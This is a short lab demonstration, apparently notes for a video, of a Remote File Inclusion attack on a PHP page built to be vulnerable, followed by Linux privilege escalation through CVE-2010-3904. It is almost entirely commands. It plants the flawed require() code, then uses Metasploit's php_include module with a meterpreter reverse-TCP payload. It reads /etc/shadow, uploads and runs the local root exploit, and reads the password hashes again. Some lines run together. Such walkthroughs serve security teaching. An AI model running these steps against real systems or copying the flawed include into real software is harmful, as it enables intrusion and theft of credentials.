Demonstration of a RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS Protocol vulnerability.
Vulnerable web page creation
mkdir 1 vi 1/index.php <?php $color='blue'; if(isset($_REQUEST['COLOR'])) { $color = $_REQUEST['COLOR']; } require ($color . '.php'); ?> chown -R apache:apache 1
Vulnerable web page exploitation through Metasploit
use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show optionsset PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploitgetuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadowlwpd
lcd /home/eromang/exploits/linux/local_escalations
upload linux-rds-exploit_CVE-2010-3904execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow